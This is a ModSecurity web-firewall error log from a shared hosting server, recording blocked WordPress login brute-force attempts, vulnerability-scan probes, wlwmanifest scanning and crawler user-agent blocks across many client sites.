[Tue May 26 19:13:01.156788 2026] [security2:error] [pid 18465:tid 18699] [client 114.119.129.4:23631] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "virgence.com"] [uri "/index.php/portfolio_page/inergy_wellness/"] [unique_id "ahWjZU6GHndkguR9cLKOpgAAAGc"], referer: https://virgence.com/index.php/portfolio_page/inergy_wellness/
[Tue May 26 19:13:01.368544 2026] [security2:error] [pid 18465:tid 18669] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjZE6GHndkguR9cLKOlQAAAEk"]
[Tue May 26 19:13:01.660499 2026] [security2:error] [pid 18465:tid 18503] [remote 54.36.102.244:36966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahWjZU6GHndkguR9cLKOvgAAcCU"]
[Tue May 26 19:13:01.670861 2026] [security2:error] [pid 18465:tid 18490] [remote 211.23.68.235:50207] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjZU6GHndkguR9cLKOxQAAMRg"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:13:01.875462 2026] [security2:error] [pid 18465:tid 18499] [remote 44.242.10.134:54899] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.10.242.44.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWjZU6GHndkguR9cLKOzAAABCE"]
[Tue May 26 19:13:02.333752 2026] [security2:error] [pid 18465:tid 18515] [remote 54.36.102.244:36966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahWjZk6GHndkguR9cLKO7AAACjE"], referer: https://avprealty.com/wp-login.php
[Tue May 26 19:13:03.175673 2026] [security2:error] [pid 18465:tid 18714] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjZk6GHndkguR9cLKPCAAAAHY"]
[Tue May 26 19:13:03.192301 2026] [security2:error] [pid 18465:tid 18510] [remote 152.53.111.131:34716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.111.53.152.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjZk6GHndkguR9cLKPGAAABCw"]
[Tue May 26 19:13:03.696205 2026] [security2:error] [pid 18465:tid 18544] [remote 44.242.10.134:54899] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.10.242.44.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWjZ06GHndkguR9cLKPPgAAG04"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 19:13:04.129121 2026] [security2:error] [pid 18465:tid 18542] [remote 162.214.79.109:44982] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 109.79.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWjZ06GHndkguR9cLKPSwAANUw"]
[Tue May 26 19:13:05.219134 2026] [security2:error] [pid 18465:tid 18654] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjaE6GHndkguR9cLKPdgAAADo"]
[Tue May 26 19:13:05.505002 2026] [core:crit] [pid 18465:tid 18721] (13)Permission denied: [client 40.77.167.55:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:13:05.811431 2026] [security2:error] [pid 18465:tid 18557] [remote 162.214.79.109:44982] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 109.79.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWjaU6GHndkguR9cLKPqQAAY1s"], referer: https://filosha.com/wp-login.php
[Tue May 26 19:13:06.715475 2026] [security2:error] [pid 18465:tid 18720] [client 74.7.244.59:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/robots.txt"] [unique_id "ahWjak6GHndkguR9cLKP3wAAAHw"]
[Tue May 26 19:13:06.745581 2026] [security2:error] [pid 18465:tid 18693] [client 74.7.244.59:53328] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/robots.txt"] [unique_id "ahWjak6GHndkguR9cLKP3QAAAGE"]
[Tue May 26 19:13:06.766035 2026] [security2:error] [pid 18465:tid 18669] [client 74.7.242.44:44628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.242.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWjak6GHndkguR9cLKP2QAAAEk"]
[Tue May 26 19:13:06.828282 2026] [security2:error] [pid 18465:tid 18713] [client 74.7.244.59:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "eco-green.com.mx"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "ahWjak6GHndkguR9cLKP6AAAAHU"], referer: http://eco-green.com.mx/robots.txt
[Tue May 26 19:13:06.835775 2026] [security2:error] [pid 18465:tid 18701] [client 74.7.244.59:53328] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "eco-green.com.mx"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "ahWjak6GHndkguR9cLKP5QAAAGk"], referer: http://eco-green.com.mx/robots.txt
[Tue May 26 19:13:07.351509 2026] [security2:error] [pid 18465:tid 18624] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjak6GHndkguR9cLKP8wAAABw"]
[Tue May 26 19:13:08.819689 2026] [security2:error] [pid 18465:tid 18480] [remote 38.95.35.74:49236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjbE6GHndkguR9cLKQPAAAbQ4"]
[Tue May 26 19:13:09.186706 2026] [security2:error] [pid 18465:tid 18713] [client 172.224.240.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWjbU6GHndkguR9cLKQWwAAAHU"]
[Tue May 26 19:13:09.386327 2026] [security2:error] [pid 18465:tid 18679] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjbE6GHndkguR9cLKQUgAAAFM"]
[Tue May 26 19:13:09.763448 2026] [security2:error] [pid 18465:tid 18589] [remote 50.6.169.131:51534] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.169.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWjbU6GHndkguR9cLKQdQAAB3s"]
[Tue May 26 19:13:10.366363 2026] [security2:error] [pid 18465:tid 18490] [remote 50.6.169.131:51534] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.169.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWjbk6GHndkguR9cLKQoAAAFRg"], referer: https://moes-art.com/wp-login.php
[Tue May 26 19:13:10.420508 2026] [security2:error] [pid 18465:tid 18503] [remote 38.95.35.74:49236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjbk6GHndkguR9cLKQngAAOiU"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:13:11.410919 2026] [security2:error] [pid 18465:tid 18616] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjbk6GHndkguR9cLKQwwAAABQ"]
[Tue May 26 19:13:11.702952 2026] [security2:error] [pid 18465:tid 18516] [remote 52.18.195.140:51976] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjb06GHndkguR9cLKQ4wAACjI"]
[Tue May 26 19:13:11.982688 2026] [security2:error] [pid 18465:tid 18535] [remote 154.26.132.116:48456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.132.26.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWjb06GHndkguR9cLKQ9gAAd0U"]
[Tue May 26 19:13:12.679872 2026] [security2:error] [pid 18465:tid 18544] [remote 154.26.132.116:48456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.132.26.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWjcE6GHndkguR9cLKRJQAAOk4"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 19:13:13.432190 2026] [security2:error] [pid 18465:tid 18627] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjcU6GHndkguR9cLKROgAAAB8"]
[Tue May 26 19:13:14.931975 2026] [security2:error] [pid 18465:tid 18558] [remote 216.73.217.110:5422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/webhook.php"] [unique_id "ahWjck6GHndkguR9cLKRmAAAbVw"]
[Tue May 26 19:13:15.312386 2026] [security2:error] [pid 18465:tid 18655] [client 74.7.230.5:55308] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.karuppuswamykovil.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWjc06GHndkguR9cLKRswAAO2Y"]
[Tue May 26 19:13:15.511146 2026] [security2:error] [pid 18465:tid 18609] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjc06GHndkguR9cLKRpwAAAA4"]
[Tue May 26 19:13:16.540898 2026] [security2:error] [pid 18465:tid 18479] [remote 18.219.113.49:52034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.113.219.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWjdE6GHndkguR9cLKR8gAADw0"]
[Tue May 26 19:13:16.923165 2026] [security2:error] [pid 18465:tid 18577] [remote 18.219.113.49:52034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.113.219.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWjdE6GHndkguR9cLKSDQAAL28"], referer: https://filosha.com/wp-login.php
[Tue May 26 19:13:16.932173 2026] [security2:error] [pid 18465:tid 18715] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjdE6GHndkguR9cLKR_wAAAHc"]
[Tue May 26 19:13:18.372051 2026] [security2:error] [pid 18465:tid 18495] [remote 199.247.4.24:50332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.4.247.199.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWjdk6GHndkguR9cLKSXQAAex0"]
[Tue May 26 19:13:19.804803 2026] [security2:error] [pid 18465:tid 18657] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjd06GHndkguR9cLKSpwAAAD0"]
[Tue May 26 19:13:20.769141 2026] [security2:error] [pid 18465:tid 18693] [client 62.60.130.210:63629] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 210.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.e3media.mx.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWjeE6GHndkguR9cLKS7AAAAGE"], referer: https://wordpress.org/
[Tue May 26 19:13:21.011780 2026] [security2:error] [pid 18465:tid 18711] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjeE6GHndkguR9cLKS6wAAAHM"]
[Tue May 26 19:13:21.368738 2026] [security2:error] [pid 18465:tid 18713] [client 62.60.130.210:50545] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 210.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.e3media.mx.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWjeU6GHndkguR9cLKTEAAAAHU"], referer: https://www.bing.com/
[Tue May 26 19:13:22.176191 2026] [security2:error] [pid 18465:tid 18721] [client 114.119.146.40:50139] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.gciamd.org.in"] [uri "/overview"] [unique_id "ahWjek6GHndkguR9cLKTPQAAAH0"], referer: https://www.gciamd.org.in/overview
[Tue May 26 19:13:23.822439 2026] [security2:error] [pid 18465:tid 18691] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWje06GHndkguR9cLKTiwAAAF8"]
[Tue May 26 19:13:25.664717 2026] [security2:error] [pid 18465:tid 18721] [client 113.173.178.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjfU6GHndkguR9cLKT7gAAAH0"]
[Tue May 26 19:13:25.697020 2026] [security2:error] [pid 18465:tid 18624] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjfU6GHndkguR9cLKT9AAAABw"]
[Tue May 26 19:13:25.922356 2026] [security2:error] [pid 18465:tid 18639] [client 178.20.43.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWjfU6GHndkguR9cLKUEgAAACs"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1222983&moderation-hash=db0fb492e761b4787df0b17ec2035da0
[Tue May 26 19:13:26.811985 2026] [security2:error] [pid 18465:tid 18674] [client 178.20.43.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWjfk6GHndkguR9cLKUSQAAAE4"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1222983&moderation-hash=db0fb492e761b4787df0b17ec2035da0
[Tue May 26 19:13:27.087886 2026] [security2:error] [pid 18465:tid 18474] [remote 103.124.95.33:36180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.95.124.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjfk6GHndkguR9cLKUTQAAJAg"]
[Tue May 26 19:13:27.592306 2026] [security2:error] [pid 18465:tid 18580] [remote 103.124.95.33:36180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.95.124.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjf06GHndkguR9cLKUbQAAAnI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:13:28.088314 2026] [security2:error] [pid 18465:tid 18654] [client 178.20.43.173:52096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 173.43.20.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWjf06GHndkguR9cLKUfgAAADo"], referer: https://anujtradingco.com/wp-login.php?action=register
[Tue May 26 19:13:28.399292 2026] [security2:error] [pid 18465:tid 18652] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjf06GHndkguR9cLKUhwAAADg"]
[Tue May 26 19:13:29.052542 2026] [security2:error] [pid 18465:tid 18692] [client 178.20.43.173:56169] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "178.20.43.173" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWjgU6GHndkguR9cLKUvAAAAGA"], referer: https://anujtradingco.com/wp-login.php?action=register
[Tue May 26 19:13:29.731063 2026] [security2:error] [pid 18465:tid 18598] [client 45.92.1.242:64079] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "systemprintsn.azurmediatec.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWjgU6GHndkguR9cLKU5wAAAAM"]
[Tue May 26 19:13:30.143642 2026] [security2:error] [pid 18465:tid 18644] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjgU6GHndkguR9cLKU4wAAADA"]
[Tue May 26 19:13:30.327863 2026] [security2:error] [pid 18465:tid 18677] [client 45.92.1.242:51067] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 242.1.92.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "systemprintsn.azurmediatec.com"] [uri "/xmlrpc.php"] [unique_id "ahWjgk6GHndkguR9cLKU-QAAAFE"]
[Tue May 26 19:13:31.078780 2026] [security2:error] [pid 18465:tid 18652] [client 45.92.1.242:62384] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "systemprintsn.azurmediatec.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWjg06GHndkguR9cLKVJQAAADg"]
[Tue May 26 19:13:31.371610 2026] [security2:error] [pid 18465:tid 18640] [client 45.92.1.242:63086] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "systemprintsn.azurmediatec.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWjg06GHndkguR9cLKVMwAAACw"]
[Tue May 26 19:13:31.678399 2026] [security2:error] [pid 18465:tid 18693] [client 45.92.1.242:63614] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "systemprintsn.azurmediatec.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWjg06GHndkguR9cLKVSQAAAGE"]
[Tue May 26 19:13:31.842529 2026] [security2:error] [pid 18465:tid 18694] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjg06GHndkguR9cLKVNgAAAGI"]
[Tue May 26 19:13:31.970065 2026] [security2:error] [pid 18465:tid 18622] [client 45.92.1.242:60386] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "systemprintsn.azurmediatec.com"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWjg06GHndkguR9cLKVXQAAABo"]
[Tue May 26 19:13:32.276594 2026] [security2:error] [pid 18465:tid 18657] [client 45.92.1.242:58830] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "systemprintsn.azurmediatec.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWjhE6GHndkguR9cLKVbAAAAD0"]
